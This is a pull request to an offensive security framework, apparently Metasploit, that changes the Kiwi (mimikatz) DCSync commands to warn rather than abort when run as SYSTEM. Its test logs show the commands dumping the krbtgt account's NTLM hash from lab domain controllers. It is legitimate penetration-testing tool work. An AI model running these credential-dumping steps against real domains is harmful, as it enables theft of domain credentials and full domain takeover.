### PR TITLE
Give warning rather than failure when running DCSync as SYSTEM

### DIFF
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
@@ -174,7 +174,7 @@ class Console::CommandDispatcher::Kiwi
   end
 
   def cmd_dcsync(*args)
-    return unless check_is_domain_user
+    check_is_domain_user
 
     if args.length != 1
       print_line('Usage: dcsync <DOMAIN\user>')
@@ -186,7 +186,7 @@ class Console::CommandDispatcher::Kiwi
   end
 
   def cmd_dcsync_ntlm(*args)
-    return unless check_is_domain_user
+    check_is_domain_user
 
     if args.length != 1
       print_line('Usage: dcsync_ntlm <DOMAIN\user>')
@@ -541,7 +541,7 @@ protected
   end
 
 
-  def check_is_domain_user(msg='Running as SYSTEM, function will not work.')
+  def check_is_domain_user(msg='Running as SYSTEM; function will only work if this computer account has replication privileges (e.g. Domain Controller)')
     if client.sys.config.is_system?
       print_warning(msg)
       return false


### PR DESCRIPTION
This PR resolves #14390. 

## Summary of the original issue

DCSync, when run from a non-domain controller, should normally be run in the context of a Domain Admin account. Running as `SYSTEM` in this circumstance is usually the wrong thing to do: the system will authenticate using the computer account in AD. If you're not running from a DC, this will usually then fail.

However there are some circumstances when running as SYSTEM is fine:

- When running directly from a DC
- When running from a non-DC Domain Computer where the computer account actually does have replication privileges.

The solution taken here is to warn the user, but try the DCSync anyway. 

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Start a meterpreter session running as Administrator on a Windows Domain Controller
- [x] Run `getsystem`
- [x] Run `load kiwi`
- [x] Run `dcsync krbtgt`
- [x] Verify the command succeeds (despite the presence of a warning), and the krbtgt hash is retrieved
- [x] Retry this attack on a domain joined, non-DC system
- [x] Verify the warning appears, alongside a failed DCSync attempt

I've tested various scenarios under two domains (functional levels 2016 and 2008), on Server 2019 and Server 2012:

Running on a Domain Controller (server 2019) - success case:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
                                                         
Success.                                
meterpreter > dcsync catest\\krbtgt                                                                                
[!] Running as SYSTEM; function will only work if this computer account is highly-privileged within the domain (e.g. Domain Controller)
[DC] 'catest.local' will be the domain  
[DC] 'CADC01.catest.local' will be the DC server
[DC] 'catest\krbtgt' will be the user account
[rpc] Service  : ldap                   
[rpc] AuthnSvc : GSS_NEGOTIATE (9)      
                                                         
Object RDN           : krbtgt           
                                                         
** SAM ACCOUNT **                       
                                                         
SAM Username         : krbtgt           
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :                  
Password last change : 8/11/2021 4:22:42 AM
Object Security ID   : S-1-5-21-4068234863-458149430-854990114-502
Object Relative ID   : 502              
                                                         
Credentials:                            
  Hash NTLM: 5f...
```

Running on a regular domain computer (server 2019) - failure case:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > dcsync catest\\krbtgt
[!] Running as SYSTEM; function will only work if this computer account is highly-privileged within the domain (e.g. Domain Controller)
[DC] 'catest.local' will be the domain
[DC] 'CADC01.catest.local' will be the DC server
[DC] 'catest\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
```

Running against a Domain Computer (server 2019) whose computer account has been added to the Domain Admins group - success edge case:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
                                                         
Success.                                
meterpreter > dcsync catest\\krbtgt                                                                                
[!] Running as SYSTEM; function will only work if this computer account is highly-privileged within the domain (e.g. Domain Controller)
[DC] 'catest.local' will be the domain  
[DC] 'CADC01.catest.local' will be the DC server
[DC] 'catest\krbtgt' will be the user account
[rpc] Service  : ldap                   
[rpc] AuthnSvc : GSS_NEGOTIATE (9)      
                                                         
Object RDN           : krbtgt           
                                                         
** SAM ACCOUNT **                       
                                                         
SAM Username         : krbtgt           
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :                  
Password last change : 8/11/2021 4:22:42 AM
Object Security ID   : S-1-5-21-4068234863-458149430-854990114-502
Object Relative ID   : 502              
                                                         
Credentials:                            
  Hash NTLM: 5f...
```


Running on a domain controller (server 2012) - success case:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM                                                                              
meterpreter > load kiwi                 
Loading extension kiwi...                                
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)       
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)              
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                          
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )                                         
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/                                         
                                                         
Success.                                
meterpreter > dcsync krbtgt                              
[!] Running as SYSTEM; function will only work if this computer account is highly-privileged within the domain (e.g. Domain Controller)                                                                                              
[DC] 'pod8.lan' will be the domain                       
[DC] 'win2012dc.pod8.lan' will be the DC server
[DC] 'krbtgt' will be the user account                   
[rpc] Service  : ldap                                   
[rpc] AuthnSvc : GSS_NEGOTIATE (9)               
                                                         
Object RDN           : krbtgt           
                                                         
** SAM ACCOUNT **                       
                                                         
SAM Username         : krbtgt                  
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )                                                 
Account expiration   :                                   
Password last change : 8/11/2021 1:07:02 PM        
Object Security ID   : S-1-5-21-417865548-2826249791-3824062093-502                                               
Object Relative ID   : 502                           
                                                         
Credentials:                                                                                                      
  Hash NTLM: 4d...
```

Running on a regular domain computer (server 2012) - failure case:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > dcsync krbtgt
[!] Running as SYSTEM; function will only work if this computer account is highly-privileged within the domain (e.g. Domain Controller)
[DC] 'pod8.lan' will be the domain
[DC] 'win2012dc.pod8.lan' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
```

Running against a Domain Computer (server 2012) whose computer account has been added to the domain's Administrators group - success edge case:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi                 
Loading extension kiwi...               
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
                                                         
Success.                                
meterpreter > dcsync krbtgt             
[!] Running as SYSTEM; function will only work if this computer account is highly-privileged within the domain (e.g. Domain Controller)
[DC] 'pod8.lan' will be the domain      
[DC] 'win2012dc.pod8.lan' will be the DC server
[DC] 'krbtgt' will be the user account  
[rpc] Service  : ldap                   
[rpc] AuthnSvc : GSS_NEGOTIATE (9)      
                                                         
Object RDN           : krbtgt           
                                                         
** SAM ACCOUNT **                       
                                                         
SAM Username         : krbtgt           
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :                  
Password last change : 8/11/2021 1:07:02 PM
Object Security ID   : S-1-5-21-417865548-2826249791-3824062093-502
Object Relative ID   : 502              

Credentials:
  Hash NTLM: 4d...
```